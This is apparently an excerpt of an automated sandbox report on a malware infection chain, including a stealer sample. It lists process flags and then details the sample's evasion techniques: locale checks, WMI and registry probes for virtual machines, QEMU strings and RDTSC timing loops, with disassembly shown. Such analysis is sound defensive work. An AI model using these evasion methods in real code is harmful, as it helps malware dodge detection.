Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\1000238002\Amadeus.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000032B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000032B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: CZjRdKVnFB.exe, 0000000F.00000002.2018687690.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000001C.00000002.2400677209.00000000032B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86E936 second address: 86E944 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3D59 second address: 9F3D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4540B7FD29h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3D80 second address: 9F3D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3D84 second address: 9F3D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3D88 second address: 9F3D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2CB7 second address: 9F2CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2CBC second address: 9F2CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F45412F2583h 0x00000008 jo 00007F45412F2576h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2CDA second address: 9F2CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F4540B7FD1Ah 0x0000000c jnc 00007F4540B7FD16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F2CF1 second address: 9F2D08 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F45412F2576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jl 00007F45412F257Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F355D second address: 9F3579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4540B7FD22h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F3579 second address: 9F357D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F64FA second address: 9F64FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F64FE second address: 9F6504 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6504 second address: 9F653D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F4540B7FD16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4540B7FD1Dh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F4540B7FD21h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F653D second address: 9F6541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6541 second address: 9F6545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6545 second address: 9F654B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F654B second address: 9F6550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6550 second address: 9F6576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F45412F2576h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F45412F257Fh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6576 second address: 86E936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4540B7FD29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push dword ptr [ebp+122D0D69h] 0x00000010 call 00007F4540B7FD22h 0x00000015 pop edi 0x00000016 mov edx, 113358C1h 0x0000001b call dword ptr [ebp+122D34C8h] 0x00000021 pushad 0x00000022 pushad 0x00000023 mov dword ptr [ebp+122D1F6Bh], eax 0x00000029 push esi 0x0000002a mov edx, dword ptr [ebp+122D3666h] 0x00000030 pop eax 0x00000031 popad 0x00000032 xor eax, eax 0x00000034 mov dword ptr [ebp+122D33DCh], eax 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e cmc 0x0000003f mov dword ptr [ebp+122D379Eh], eax 0x00000045 pushad 0x00000046 mov dword ptr [ebp+122D1F6Bh], ecx 0x0000004c mov eax, 4002C833h 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 sub dword ptr [ebp+122D33DCh], edi 0x0000005d sub dword ptr [ebp+122D34BDh], edi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 sub dword ptr [ebp+122D34BDh], esi 0x0000006d lodsw 0x0000006f pushad 0x00000070 mov bh, dl 0x00000072 push edx 0x00000073 pop ecx 0x00000074 popad 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 or dword ptr [ebp+122D1EF3h], edi 0x0000007f jmp 00007F4540B7FD23h 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 cld 0x00000089 nop 0x0000008a push esi 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F4540B7FD29h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6700 second address: 9F6706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F691B second address: 9F6921 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6921 second address: 9F694F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 00FE5C94h 0x0000000f mov esi, eax 0x00000011 lea ebx, dword ptr [ebp+1245B454h] 0x00000017 mov dl, 8Ah 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d jmp 00007F45412F2580h 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F69DB second address: 9F69F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4540B7FD21h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F69F5 second address: 9F6A93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2587h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jbe 00007F45412F2588h 0x00000013 jns 00007F45412F2582h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c pushad 0x0000001d jo 00007F45412F2576h 0x00000023 jne 00007F45412F2576h 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pop eax 0x0000002e popad 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 jno 00007F45412F257Ah 0x00000039 pop eax 0x0000003a add dword ptr [ebp+122D26DAh], edi 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 jmp 00007F45412F257Fh 0x00000049 push 00000003h 0x0000004b movzx edi, di 0x0000004e call 00007F45412F2579h 0x00000053 ja 00007F45412F2580h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c je 00007F45412F257Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6A93 second address: 9F6A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6A97 second address: 9F6AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F2584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A172BA second address: A172BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A172BE second address: A172E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45412F257Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F45412F257Bh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
